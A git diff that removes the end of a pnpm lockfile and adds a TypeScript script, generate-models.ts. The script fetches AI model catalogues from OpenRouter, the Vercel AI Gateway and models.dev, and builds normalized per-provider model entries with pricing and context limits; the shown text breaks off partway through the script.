-  '@babel/runtime@7.28.6': {}
-
-  '@google/genai@1.45.0':
-    dependencies:
-      google-auth-library: 10.6.1
-      p-retry: 4.6.2
-      protobufjs: 7.5.4
-      ws: 8.19.0
-    transitivePeerDependencies:
-      - bufferutil
-      - supports-color
-      - utf-8-validate
-
-  '@isaacs/cliui@8.0.2':
-    dependencies:
-      string-width: 5.1.2
-      string-width-cjs: string-width@4.2.3
-      strip-ansi: 7.2.0
-      strip-ansi-cjs: strip-ansi@6.0.1
-      wrap-ansi: 8.1.0
-      wrap-ansi-cjs: wrap-ansi@7.0.0
-
-  '@mistralai/mistralai@1.14.1':
-    dependencies:
-      ws: 8.19.0
-      zod: 4.3.6
-      zod-to-json-schema: 3.25.1(zod@4.3.6)
-    transitivePeerDependencies:
-      - bufferutil
-      - utf-8-validate
-
-  '@pkgjs/parseargs@0.11.0':
-    optional: true
-
-  '@protobufjs/aspromise@1.1.2': {}
-
-  '@protobufjs/base64@1.1.2': {}
-
-  '@protobufjs/codegen@2.0.4': {}
-
-  '@protobufjs/eventemitter@1.1.0': {}
-
-  '@protobufjs/fetch@1.1.0':
-    dependencies:
-      '@protobufjs/aspromise': 1.1.2
-      '@protobufjs/inquire': 1.1.0
-
-  '@protobufjs/float@1.0.2': {}
-
-  '@protobufjs/inquire@1.1.0': {}
-
-  '@protobufjs/path@1.1.2': {}
-
-  '@protobufjs/pool@1.1.0': {}
-
-  '@protobufjs/utf8@1.1.0': {}
-
-  '@sinclair/typebox@0.34.48': {}
-
-  '@smithy/abort-controller@4.2.12':
-    dependencies:
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/config-resolver@4.4.11':
-    dependencies:
-      '@smithy/node-config-provider': 4.3.12
-      '@smithy/types': 4.13.1
-      '@smithy/util-config-provider': 4.2.2
-      '@smithy/util-endpoints': 3.3.3
-      '@smithy/util-middleware': 4.2.12
-      tslib: 2.8.1
-
-  '@smithy/core@3.23.12':
-    dependencies:
-      '@smithy/protocol-http': 5.3.12
-      '@smithy/types': 4.13.1
-      '@smithy/url-parser': 4.2.12
-      '@smithy/util-base64': 4.3.2
-      '@smithy/util-body-length-browser': 4.2.2
-      '@smithy/util-middleware': 4.2.12
-      '@smithy/util-stream': 4.5.20
-      '@smithy/util-utf8': 4.2.2
-      '@smithy/uuid': 1.1.2
-      tslib: 2.8.1
-
-  '@smithy/credential-provider-imds@4.2.12':
-    dependencies:
-      '@smithy/node-config-provider': 4.3.12
-      '@smithy/property-provider': 4.2.12
-      '@smithy/types': 4.13.1
-      '@smithy/url-parser': 4.2.12
-      tslib: 2.8.1
-
-  '@smithy/eventstream-codec@4.2.12':
-    dependencies:
-      '@aws-crypto/crc32': 5.2.0
-      '@smithy/types': 4.13.1
-      '@smithy/util-hex-encoding': 4.2.2
-      tslib: 2.8.1
-
-  '@smithy/eventstream-serde-browser@4.2.12':
-    dependencies:
-      '@smithy/eventstream-serde-universal': 4.2.12
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/eventstream-serde-config-resolver@4.3.12':
-    dependencies:
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/eventstream-serde-node@4.2.12':
-    dependencies:
-      '@smithy/eventstream-serde-universal': 4.2.12
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/eventstream-serde-universal@4.2.12':
-    dependencies:
-      '@smithy/eventstream-codec': 4.2.12
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/fetch-http-handler@5.3.15':
-    dependencies:
-      '@smithy/protocol-http': 5.3.12
-      '@smithy/querystring-builder': 4.2.12
-      '@smithy/types': 4.13.1
-      '@smithy/util-base64': 4.3.2
-      tslib: 2.8.1
-
-  '@smithy/hash-node@4.2.12':
-    dependencies:
-      '@smithy/types': 4.13.1
-      '@smithy/util-buffer-from': 4.2.2
-      '@smithy/util-utf8': 4.2.2
-      tslib: 2.8.1
-
-  '@smithy/invalid-dependency@4.2.12':
-    dependencies:
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/is-array-buffer@2.2.0':
-    dependencies:
-      tslib: 2.8.1
-
-  '@smithy/is-array-buffer@4.2.2':
-    dependencies:
-      tslib: 2.8.1
-
-  '@smithy/middleware-content-length@4.2.12':
-    dependencies:
-      '@smithy/protocol-http': 5.3.12
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/middleware-endpoint@4.4.26':
-    dependencies:
-      '@smithy/core': 3.23.12
-      '@smithy/middleware-serde': 4.2.15
-      '@smithy/node-config-provider': 4.3.12
-      '@smithy/shared-ini-file-loader': 4.4.7
-      '@smithy/types': 4.13.1
-      '@smithy/url-parser': 4.2.12
-      '@smithy/util-middleware': 4.2.12
-      tslib: 2.8.1
-
-  '@smithy/middleware-retry@4.4.43':
-    dependencies:
-      '@smithy/node-config-provider': 4.3.12
-      '@smithy/protocol-http': 5.3.12
-      '@smithy/service-error-classification': 4.2.12
-      '@smithy/smithy-client': 4.12.6
-      '@smithy/types': 4.13.1
-      '@smithy/util-middleware': 4.2.12
-      '@smithy/util-retry': 4.2.12
-      '@smithy/uuid': 1.1.2
-      tslib: 2.8.1
-
-  '@smithy/middleware-serde@4.2.15':
-    dependencies:
-      '@smithy/core': 3.23.12
-      '@smithy/protocol-http': 5.3.12
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/middleware-stack@4.2.12':
-    dependencies:
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/node-config-provider@4.3.12':
-    dependencies:
-      '@smithy/property-provider': 4.2.12
-      '@smithy/shared-ini-file-loader': 4.4.7
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/node-http-handler@4.5.0':
-    dependencies:
-      '@smithy/abort-controller': 4.2.12
-      '@smithy/protocol-http': 5.3.12
-      '@smithy/querystring-builder': 4.2.12
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/property-provider@4.2.12':
-    dependencies:
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/protocol-http@5.3.12':
-    dependencies:
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/querystring-builder@4.2.12':
-    dependencies:
-      '@smithy/types': 4.13.1
-      '@smithy/util-uri-escape': 4.2.2
-      tslib: 2.8.1
-
-  '@smithy/querystring-parser@4.2.12':
-    dependencies:
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/service-error-classification@4.2.12':
-    dependencies:
-      '@smithy/types': 4.13.1
-
-  '@smithy/shared-ini-file-loader@4.4.7':
-    dependencies:
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/signature-v4@5.3.12':
-    dependencies:
-      '@smithy/is-array-buffer': 4.2.2
-      '@smithy/protocol-http': 5.3.12
-      '@smithy/types': 4.13.1
-      '@smithy/util-hex-encoding': 4.2.2
-      '@smithy/util-middleware': 4.2.12
-      '@smithy/util-uri-escape': 4.2.2
-      '@smithy/util-utf8': 4.2.2
-      tslib: 2.8.1
-
-  '@smithy/smithy-client@4.12.6':
-    dependencies:
-      '@smithy/core': 3.23.12
-      '@smithy/middleware-endpoint': 4.4.26
-      '@smithy/middleware-stack': 4.2.12
-      '@smithy/protocol-http': 5.3.12
-      '@smithy/types': 4.13.1
-      '@smithy/util-stream': 4.5.20
-      tslib: 2.8.1
-
-  '@smithy/types@4.13.1':
-    dependencies:
-      tslib: 2.8.1
-
-  '@smithy/url-parser@4.2.12':
-    dependencies:
-      '@smithy/querystring-parser': 4.2.12
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/util-base64@4.3.2':
-    dependencies:
-      '@smithy/util-buffer-from': 4.2.2
-      '@smithy/util-utf8': 4.2.2
-      tslib: 2.8.1
-
-  '@smithy/util-body-length-browser@4.2.2':
-    dependencies:
-      tslib: 2.8.1
-
-  '@smithy/util-body-length-node@4.2.3':
-    dependencies:
-      tslib: 2.8.1
-
-  '@smithy/util-buffer-from@2.2.0':
-    dependencies:
-      '@smithy/is-array-buffer': 2.2.0
-      tslib: 2.8.1
-
-  '@smithy/util-buffer-from@4.2.2':
-    dependencies:
-      '@smithy/is-array-buffer': 4.2.2
-      tslib: 2.8.1
-
-  '@smithy/util-config-provider@4.2.2':
-    dependencies:
-      tslib: 2.8.1
-
-  '@smithy/util-defaults-mode-browser@4.3.42':
-    dependencies:
-      '@smithy/property-provider': 4.2.12
-      '@smithy/smithy-client': 4.12.6
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/util-defaults-mode-node@4.2.45':
-    dependencies:
-      '@smithy/config-resolver': 4.4.11
-      '@smithy/credential-provider-imds': 4.2.12
-      '@smithy/node-config-provider': 4.3.12
-      '@smithy/property-provider': 4.2.12
-      '@smithy/smithy-client': 4.12.6
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/util-endpoints@3.3.3':
-    dependencies:
-      '@smithy/node-config-provider': 4.3.12
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/util-hex-encoding@4.2.2':
-    dependencies:
-      tslib: 2.8.1
-
-  '@smithy/util-middleware@4.2.12':
-    dependencies:
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/util-retry@4.2.12':
-    dependencies:
-      '@smithy/service-error-classification': 4.2.12
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@smithy/util-stream@4.5.20':
-    dependencies:
-      '@smithy/fetch-http-handler': 5.3.15
-      '@smithy/node-http-handler': 4.5.0
-      '@smithy/types': 4.13.1
-      '@smithy/util-base64': 4.3.2
-      '@smithy/util-buffer-from': 4.2.2
-      '@smithy/util-hex-encoding': 4.2.2
-      '@smithy/util-utf8': 4.2.2
-      tslib: 2.8.1
-
-  '@smithy/util-uri-escape@4.2.2':
-    dependencies:
-      tslib: 2.8.1
-
-  '@smithy/util-utf8@2.3.0':
-    dependencies:
-      '@smithy/util-buffer-from': 2.2.0
-      tslib: 2.8.1
-
-  '@smithy/util-utf8@4.2.2':
-    dependencies:
-      '@smithy/util-buffer-from': 4.2.2
-      tslib: 2.8.1
-
-  '@smithy/uuid@1.1.2':
-    dependencies:
-      tslib: 2.8.1
-
-  '@tootallnate/quickjs-emscripten@0.23.0': {}
-
-  '@types/node@25.5.0':
-    dependencies:
-      undici-types: 7.18.2
-
-  '@types/retry@0.12.0': {}
-
-  agent-base@7.1.4: {}
-
-  ajv-formats@3.0.1(ajv@8.18.0):
-    optionalDependencies:
-      ajv: 8.18.0
-
-  ajv@8.18.0:
-    dependencies:
-      fast-deep-equal: 3.1.3
-      fast-uri: 3.1.0
-      json-schema-traverse: 1.0.0
-      require-from-string: 2.0.2
-
-  ansi-regex@5.0.1: {}
-
-  ansi-regex@6.2.2: {}
-
-  ansi-styles@4.3.0:
-    dependencies:
-      color-convert: 2.0.1
-
-  ansi-styles@6.2.3: {}
-
-  ast-types@0.13.4:
-    dependencies:
-      tslib: 2.8.1
-
-  balanced-match@1.0.2: {}
-
-  base64-js@1.5.1: {}
-
-  basic-ftp@5.2.0: {}
-
-  bignumber.js@9.3.1: {}
-
-  bowser@2.14.1: {}
-
-  brace-expansion@2.0.2:
-    dependencies:
-      balanced-match: 1.0.2
-
-  buffer-equal-constant-time@1.0.1: {}
-
-  chalk@5.6.2: {}
-
-  color-convert@2.0.1:
-    dependencies:
-      color-name: 1.1.4
-
-  color-name@1.1.4: {}
-
-  cross-spawn@7.0.6:
-    dependencies:
-      path-key: 3.1.1
-      shebang-command: 2.0.0
-      which: 2.0.2
-
-  data-uri-to-buffer@4.0.1: {}
-
-  data-uri-to-buffer@6.0.2: {}
-
-  debug@4.4.3:
-    dependencies:
-      ms: 2.1.3
-
-  degenerator@5.0.1:
-    dependencies:
-      ast-types: 0.13.4
-      escodegen: 2.1.0
-      esprima: 4.0.1
-
-  eastasianwidth@0.2.0: {}
-
-  ecdsa-sig-formatter@1.0.11:
-    dependencies:
-      safe-buffer: 5.2.1
-
-  emoji-regex@8.0.0: {}
-
-  emoji-regex@9.2.2: {}
-
-  escodegen@2.1.0:
-    dependencies:
-      esprima: 4.0.1
-      estraverse: 5.3.0
-      esutils: 2.0.3
-    optionalDependencies:
-      source-map: 0.6.1
-
-  esprima@4.0.1: {}
-
-  estraverse@5.3.0: {}
-
-  esutils@2.0.3: {}
-
-  extend@3.0.2: {}
-
-  fast-deep-equal@3.1.3: {}
-
-  fast-uri@3.1.0: {}
-
-  fast-xml-builder@1.1.4:
-    dependencies:
-      path-expression-matcher: 1.1.3
-
-  fast-xml-parser@5.4.1:
-    dependencies:
-      fast-xml-builder: 1.1.4
-      strnum: 2.2.0
-
-  fetch-blob@3.2.0:
-    dependencies:
-      node-domexception: 1.0.0
-      web-streams-polyfill: 3.3.3
-
-  foreground-child@3.3.1:
-    dependencies:
-      cross-spawn: 7.0.6
-      signal-exit: 4.1.0
-
-  formdata-polyfill@4.0.10:
-    dependencies:
-      fetch-blob: 3.2.0
-
-  gaxios@7.1.3:
-    dependencies:
-      extend: 3.0.2
-      https-proxy-agent: 7.0.6
-      node-fetch: 3.3.2
-      rimraf: 5.0.10
-    transitivePeerDependencies:
-      - supports-color
-
-  gcp-metadata@8.1.2:
-    dependencies:
-      gaxios: 7.1.3
-      google-logging-utils: 1.1.3
-      json-bigint: 1.0.0
-    transitivePeerDependencies:
-      - supports-color
-
-  get-uri@6.0.5:
-    dependencies:
-      basic-ftp: 5.2.0
-      data-uri-to-buffer: 6.0.2
-      debug: 4.4.3
-    transitivePeerDependencies:
-      - supports-color
-
-  glob@10.5.0:
-    dependencies:
-      foreground-child: 3.3.1
-      jackspeak: 3.4.3
-      minimatch: 9.0.9
-      minipass: 7.1.3
-      package-json-from-dist: 1.0.1
-      path-scurry: 1.11.1
-
-  google-auth-library@10.6.1:
-    dependencies:
-      base64-js: 1.5.1
-      ecdsa-sig-formatter: 1.0.11
-      gaxios: 7.1.3
-      gcp-metadata: 8.1.2
-      google-logging-utils: 1.1.3
-      jws: 4.0.1
-    transitivePeerDependencies:
-      - supports-color
-
-  google-logging-utils@1.1.3: {}
-
-  http-proxy-agent@7.0.2:
-    dependencies:
-      agent-base: 7.1.4
-      debug: 4.4.3
-    transitivePeerDependencies:
-      - supports-color
-
-  https-proxy-agent@7.0.6:
-    dependencies:
-      agent-base: 7.1.4
-      debug: 4.4.3
-    transitivePeerDependencies:
-      - supports-color
-
-  ip-address@10.1.0: {}
-
-  is-fullwidth-code-point@3.0.0: {}
-
-  isexe@2.0.0: {}
-
-  jackspeak@3.4.3:
-    dependencies:
-      '@isaacs/cliui': 8.0.2
-    optionalDependencies:
-      '@pkgjs/parseargs': 0.11.0
-
-  json-bigint@1.0.0:
-    dependencies:
-      bignumber.js: 9.3.1
-
-  json-schema-to-ts@3.1.1:
-    dependencies:
-      '@babel/runtime': 7.28.6
-      ts-algebra: 2.0.0
-
-  json-schema-traverse@1.0.0: {}
-
-  jwa@2.0.1:
-    dependencies:
-      buffer-equal-constant-time: 1.0.1
-      ecdsa-sig-formatter: 1.0.11
-      safe-buffer: 5.2.1
-
-  jws@4.0.1:
-    dependencies:
-      jwa: 2.0.1
-      safe-buffer: 5.2.1
-
-  long@5.3.2: {}
-
-  lru-cache@10.4.3: {}
-
-  lru-cache@7.18.3: {}
-
-  minimatch@9.0.9:
-    dependencies:
-      brace-expansion: 2.0.2
-
-  minipass@7.1.3: {}
-
-  ms@2.1.3: {}
-
-  netmask@2.0.2: {}
-
-  node-domexception@1.0.0: {}
-
-  node-fetch@3.3.2:
-    dependencies:
-      data-uri-to-buffer: 4.0.1
-      fetch-blob: 3.2.0
-      formdata-polyfill: 4.0.10
-
-  openai@6.26.0(ws@8.19.0)(zod@4.3.6):
-    optionalDependencies:
-      ws: 8.19.0
-      zod: 4.3.6
-
-  p-retry@4.6.2:
-    dependencies:
-      '@types/retry': 0.12.0
-      retry: 0.13.1
-
-  pac-proxy-agent@7.2.0:
-    dependencies:
-      '@tootallnate/quickjs-emscripten': 0.23.0
-      agent-base: 7.1.4
-      debug: 4.4.3
-      get-uri: 6.0.5
-      http-proxy-agent: 7.0.2
-      https-proxy-agent: 7.0.6
-      pac-resolver: 7.0.1
-      socks-proxy-agent: 8.0.5
-    transitivePeerDependencies:
-      - supports-color
-
-  pac-resolver@7.0.1:
-    dependencies:
-      degenerator: 5.0.1
-      netmask: 2.0.2
-
-  package-json-from-dist@1.0.1: {}
-
-  path-expression-matcher@1.1.3: {}
-
-  path-key@3.1.1: {}
-
-  path-scurry@1.11.1:
-    dependencies:
-      lru-cache: 10.4.3
-      minipass: 7.1.3
-
-  protobufjs@7.5.4:
-    dependencies:
-      '@protobufjs/aspromise': 1.1.2
-      '@protobufjs/base64': 1.1.2
-      '@protobufjs/codegen': 2.0.4
-      '@protobufjs/eventemitter': 1.1.0
-      '@protobufjs/fetch': 1.1.0
-      '@protobufjs/float': 1.0.2
-      '@protobufjs/inquire': 1.1.0
-      '@protobufjs/path': 1.1.2
-      '@protobufjs/pool': 1.1.0
-      '@protobufjs/utf8': 1.1.0
-      '@types/node': 25.5.0
-      long: 5.3.2
-
-  proxy-agent@6.5.0:
-    dependencies:
-      agent-base: 7.1.4
-      debug: 4.4.3
-      http-proxy-agent: 7.0.2
-      https-proxy-agent: 7.0.6
-      lru-cache: 7.18.3
-      pac-proxy-agent: 7.2.0
-      proxy-from-env: 1.1.0
-      socks-proxy-agent: 8.0.5
-    transitivePeerDependencies:
-      - supports-color
-
-  proxy-from-env@1.1.0: {}
-
-  require-from-string@2.0.2: {}
-
-  retry@0.13.1: {}
-
-  rimraf@5.0.10:
-    dependencies:
-      glob: 10.5.0
-
-  safe-buffer@5.2.1: {}
-
-  shebang-command@2.0.0:
-    dependencies:
-      shebang-regex: 3.0.0
-
-  shebang-regex@3.0.0: {}
-
-  signal-exit@4.1.0: {}
-
-  smart-buffer@4.2.0: {}
-
-  socks-proxy-agent@8.0.5:
-    dependencies:
-      agent-base: 7.1.4
-      debug: 4.4.3
-      socks: 2.8.7
-    transitivePeerDependencies:
-      - supports-color
-
-  socks@2.8.7:
-    dependencies:
-      ip-address: 10.1.0
-      smart-buffer: 4.2.0
-
-  source-map@0.6.1:
-    optional: true
-
-  string-width@4.2.3:
-    dependencies:
-      emoji-regex: 8.0.0
-      is-fullwidth-code-point: 3.0.0
-      strip-ansi: 6.0.1
-
-  string-width@5.1.2:
-    dependencies:
-      eastasianwidth: 0.2.0
-      emoji-regex: 9.2.2
-      strip-ansi: 7.2.0
-
-  strip-ansi@6.0.1:
-    dependencies:
-      ansi-regex: 5.0.1
-
-  strip-ansi@7.2.0:
-    dependencies:
-      ansi-regex: 6.2.2
-
-  strnum@2.2.0: {}
-
-  ts-algebra@2.0.0: {}
-
-  tslib@2.8.1: {}
-
-  undici-types@7.18.2: {}
-
-  undici@7.24.4: {}
-
-  web-streams-polyfill@3.3.3: {}
-
-  which@2.0.2:
-    dependencies:
-      isexe: 2.0.0
-
-  wrap-ansi@7.0.0:
-    dependencies:
-      ansi-styles: 4.3.0
-      string-width: 4.2.3
-      strip-ansi: 6.0.1
-
-  wrap-ansi@8.1.0:
-    dependencies:
-      ansi-styles: 6.2.3
-      string-width: 5.1.2
-      strip-ansi: 7.2.0
-
-  ws@8.19.0: {}
-
-  zod-to-json-schema@3.25.1(zod@4.3.6):
-    dependencies:
-      zod: 4.3.6
-
-  zod@4.3.6: {}
diff --git a/packages/pi-ai/scripts/generate-models.ts b/packages/pi-ai/scripts/generate-models.ts
new file mode 100644
index 000000000..839428bcb
--- /dev/null
+++ b/packages/pi-ai/scripts/generate-models.ts
@@ -0,0 +1,1543 @@
+#!/usr/bin/env tsx
+
+import { writeFileSync } from "fs";
+import { join, dirname } from "path";
+import { fileURLToPath } from "url";
+import { Api, KnownProvider, Model } from "../src/types.js";
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+const packageRoot = join(__dirname, "..");
+
+interface ModelsDevModel {
+	id: string;
+	name: string;
+	tool_call?: boolean;
+	reasoning?: boolean;
+	limit?: {
+		context?: number;
+		output?: number;
+	};
+	cost?: {
+		input?: number;
+		output?: number;
+		cache_read?: number;
+		cache_write?: number;
+	};
+	modalities?: {
+		input?: string[];
+	};
+	provider?: {
+		npm?: string;
+	};
+}
+
+interface AiGatewayModel {
+	id: string;
+	name?: string;
+	context_window?: number;
+	max_tokens?: number;
+	tags?: string[];
+	pricing?: {
+		input?: string | number;
+		output?: string | number;
+		input_cache_read?: string | number;
+		input_cache_write?: string | number;
+	};
+}
+
+const COPILOT_STATIC_HEADERS = {
+	"User-Agent": "GitHubCopilotChat/0.35.0",
+	"Editor-Version": "vscode/1.107.0",
+	"Editor-Plugin-Version": "copilot-chat/0.35.0",
+	"Copilot-Integration-Id": "vscode-chat",
+} as const;
+
+const AI_GATEWAY_MODELS_URL = "https://ai-gateway.vercel.sh/v1";
+const AI_GATEWAY_BASE_URL = "https://ai-gateway.vercel.sh";
+
+async function fetchOpenRouterModels(): Promise<Model<any>[]> {
+	try {
+		console.log("Fetching models from OpenRouter API...");
+		const response = await fetch("https://openrouter.ai/api/v1/models");
+		const data = await response.json();
+
+		const models: Model<any>[] = [];
+
+		for (const model of data.data) {
+			// Only include models that support tools
+			if (!model.supported_parameters?.includes("tools")) continue;
+
+			// Parse provider from model ID
+			let provider: KnownProvider = "openrouter";
+			let modelKey = model.id;
+
+			modelKey = model.id; // Keep full ID for OpenRouter
+
+			// Parse input modalities
+			const input: ("text" | "image")[] = ["text"];
+			if (model.architecture?.modality?.includes("image")) {
+				input.push("image");
+			}
+
+			// Convert pricing from $/token to $/million tokens
+			const inputCost = parseFloat(model.pricing?.prompt || "0") * 1_000_000;
+			const outputCost = parseFloat(model.pricing?.completion || "0") * 1_000_000;
+			const cacheReadCost = parseFloat(model.pricing?.input_cache_read || "0") * 1_000_000;
+			const cacheWriteCost = parseFloat(model.pricing?.input_cache_write || "0") * 1_000_000;
+
+			const normalizedModel: Model<any> = {
+				id: modelKey,
+				name: model.name,
+				api: "openai-completions",
+				baseUrl: "https://openrouter.ai/api/v1",
+				provider,
+				reasoning: model.supported_parameters?.includes("reasoning") || false,
+				input,
+				cost: {
+					input: inputCost,
+					output: outputCost,
+					cacheRead: cacheReadCost,
+					cacheWrite: cacheWriteCost,
+				},
+				contextWindow: model.context_length || 4096,
+				maxTokens: model.top_provider?.max_completion_tokens || 4096,
+			};
+			models.push(normalizedModel);
+		}
+
+		console.log(`Fetched ${models.length} tool-capable models from OpenRouter`);
+		return models;
+	} catch (error) {
+		console.error("Failed to fetch OpenRouter models:", error);
+		return [];
+	}
+}
+
+async function fetchAiGatewayModels(): Promise<Model<any>[]> {
+	try {
+		console.log("Fetching models from Vercel AI Gateway API...");
+		const response = await fetch(`${AI_GATEWAY_MODELS_URL}/models`);
+		const data = await response.json();
+		const models: Model<any>[] = [];
+
+		const toNumber = (value: string | number | undefined): number => {
+			if (typeof value === "number") {
+				return Number.isFinite(value) ? value : 0;
+			}
+			const parsed = parseFloat(value ?? "0");
+			return Number.isFinite(parsed) ? parsed : 0;
+		};
+
+		const items = Array.isArray(data.data) ? (data.data as AiGatewayModel[]) : [];
+		for (const model of items) {
+			const tags = Array.isArray(model.tags) ? model.tags : [];
+			// Only include models that support tools
+			if (!tags.includes("tool-use")) continue;
+
+			const input: ("text" | "image")[] = ["text"];
+			if (tags.includes("vision")) {
+				input.push("image");
+			}
+
+			const inputCost = toNumber(model.pricing?.input) * 1_000_000;
+			const outputCost = toNumber(model.pricing?.output) * 1_000_000;
+			const cacheReadCost = toNumber(model.pricing?.input_cache_read) * 1_000_000;
+			const cacheWriteCost = toNumber(model.pricing?.input_cache_write) * 1_000_000;
+
+			models.push({
+				id: model.id,
+				name: model.name || model.id,
+				api: "anthropic-messages",
+				baseUrl: AI_GATEWAY_BASE_URL,
+				provider: "vercel-ai-gateway",
+				reasoning: tags.includes("reasoning"),
+				input,
+				cost: {
+					input: inputCost,
+					output: outputCost,
+					cacheRead: cacheReadCost,
+					cacheWrite: cacheWriteCost,
+				},
+				contextWindow: model.context_window || 4096,
+				maxTokens: model.max_tokens || 4096,
+			});
+		}
+
+		console.log(`Fetched ${models.length} tool-capable models from Vercel AI Gateway`);
+		return models;
+	} catch (error) {
+		console.error("Failed to fetch Vercel AI Gateway models:", error);
+		return [];
+	}
+}
+
+async function loadModelsDevData(): Promise<Model<any>[]> {
+	try {
+		console.log("Fetching models from models.dev API...");
+		const response = await fetch("https://models.dev/api.json");
+		const data = await response.json();
+
+		const models: Model<any>[] = [];
+
+		// Process Amazon Bedrock models
+		if (data["amazon-bedrock"]?.models) {
+			for (const [modelId, model] of Object.entries(data["amazon-bedrock"].models)) {
+				const m = model as ModelsDevModel;
+				if (m.tool_call !== true) continue;
+
+				let id = modelId;
+
+				if (id.startsWith("ai21.jamba")) {
+					// These models doesn't support tool use in streaming mode
+					continue;
+				}
+
+				if (id.startsWith("mistral.mistral-7b-instruct-v0")) {
+					// These models doesn't support system messages
+					continue;
+				}
+
+				models.push({
+					id,
+					name: m.name || id,
+					api: "bedrock-converse-stream" as const,
+					provider: "amazon-bedrock" as const,
+					baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com",
+					reasoning: m.reasoning === true,
+					input: (m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"]) as ("text" | "image")[],
+					cost: {
+						input: m.cost?.input || 0,
+						output: m.cost?.output || 0,
+						cacheRead: m.cost?.cache_read || 0,
+						cacheWrite: m.cost?.cache_write || 0,
+					},
+					contextWindow: m.limit?.context || 4096,
+					maxTokens: m.limit?.output || 4096,
+				});
+			}
+		}
+
+		// Process Anthropic models
+		if (data.anthropic?.models) {
+			for (const [modelId, model] of Object.entries(data.anthropic.models)) {
+				const m = model as ModelsDevModel;
+				if (m.tool_call !== true) continue;
+
+				models.push({
+					id: modelId,
+					name: m.name || modelId,
+					api: "anthropic-messages",
+					provider: "anthropic",
+					baseUrl: "https://api.anthropic.com",
+					reasoning: m.reasoning === true,
+					input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"],
+					cost: {
+						input: m.cost?.input || 0,
+						output: m.cost?.output || 0,
+						cacheRead: m.cost?.cache_read || 0,
+						cacheWrite: m.cost?.cache_write || 0,
+					},
+					contextWindow: m.limit?.context || 4096,
+					maxTokens: m.limit?.output || 4096,
+				});
+			}
+		}
+
+		// Process Google models
+		if (data.google?.models) {
+			for (const [modelId, model] of Object.entries(data.google.models)) {
+				const m = model as ModelsDevModel;
+				if (m.tool_call !== true) continue;
+
+				models.push({
+					id: modelId,
+					name: m.name || modelId,
+					api: "google-generative-ai",
+					provider: "google",
+					baseUrl: "https://generativelanguage.googleapis.com/v1beta",
+					reasoning: m.reasoning === true,
+					input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"],
+					cost: {
+						input: m.cost?.input || 0,
+						output: m.cost?.output || 0,
+						cacheRead: m.cost?.cache_read || 0,
+						cacheWrite: m.cost?.cache_write || 0,
+					},
+					contextWindow: m.limit?.context || 4096,
+					maxTokens: m.limit?.output || 4096,
+				});
+			}
+		}
+
+		// Process OpenAI models
+		if (data.openai?.models) {
+			for (const [modelId, model] of Object.entries(data.openai.models)) {
+				const m = model as ModelsDevModel;
+				if (m.tool_call !== true) continue;
+
+				models.push({
+					id: modelId,
+					name: m.name || modelId,
+					api: "openai-responses",
+					provider: "openai",
+					baseUrl: "https://api.openai.com/v1",
+					reasoning: m.reasoning === true,
+					input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"],
+					cost: {
+						input: m.cost?.input || 0,
+						output: m.cost?.output || 0,
+						cacheRead: m.cost?.cache_read || 0,
+						cacheWrite: m.cost?.cache_write || 0,
+					},
+					contextWindow: m.limit?.context || 4096,
+					maxTokens: m.limit?.output || 4096,
+				});
+			}
+		}
+
+		// Process Groq models
+		if (data.groq?.models) {
+			for (const [modelId, model] of Object.entries(data.groq.models)) {
+				const m = model as ModelsDevModel;
+				if (m.tool_call !== true) continue;
+
+				models.push({
+					id: modelId,
+					name: m.name || modelId,
+					api: "openai-completions",
+					provider: "groq",
+					baseUrl: "https://api.groq.com/openai/v1",
+					reasoning: m.reasoning === true,
+					input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"],
+					cost: {
+						input: m.cost?.input || 0,
+						output: m.cost?.output || 0,
+						cacheRead: m.cost?.cache_read || 0,
+						cacheWrite: m.cost?.cache_write || 0,
+					},
+					contextWindow: m.limit?.context || 4096,
+					maxTokens: m.limit?.output || 4096,
+				});
+			}
+		}
+
+		// Process Cerebras models
+		if (data.cerebras?.models) {
+			for (const [modelId, model] of Object.entries(data.cerebras.models)) {
+				const m = model as ModelsDevModel;
+				if (m.tool_call !== true) continue;
+
+				models.push({
+					id: modelId,
+					name: m.name || modelId,
+					api: "openai-completions",
+					provider: "cerebras",
+					baseUrl: "https://api.cerebras.ai/v1",
+					reasoning: m.reasoning === true,
+					input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"],
+					cost: {
+						input: m.cost?.input || 0,
+						output: m.cost?.output || 0,
+						cacheRead: m.cost?.cache_read || 0,
+						cacheWrite: m.cost?.cache_write || 0,
+					},
+					contextWindow: m.limit?.context || 4096,
+					maxTokens: m.limit?.output || 4096,
+				});
+			}
+		}
+
+		// Process xAi models
+		if (data.xai?.models) {
+			for (const [modelId, model] of Object.entries(data.xai.models)) {
+				const m = model as ModelsDevModel;
+				if (m.tool_call !== true) continue;
+
+				models.push({
+					id: modelId,
